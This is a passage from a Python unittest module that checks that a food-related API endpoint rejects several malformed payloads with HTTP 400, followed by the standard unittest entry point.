        # Every malformed payload is rejected with 400 Bad Request.
        for bad_payload in (
                invalid_food_obj,
                invalid_food_input,
                invalid_food_input1,
                invalid_food_input2,
        ):
            rejected = self.post_food(bad_payload, token)
            self.assertEqual(rejected.status_code, 400)
# Allow running this test module directly (e.g. `python <file>`).
if __name__ == "__main__":
    unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.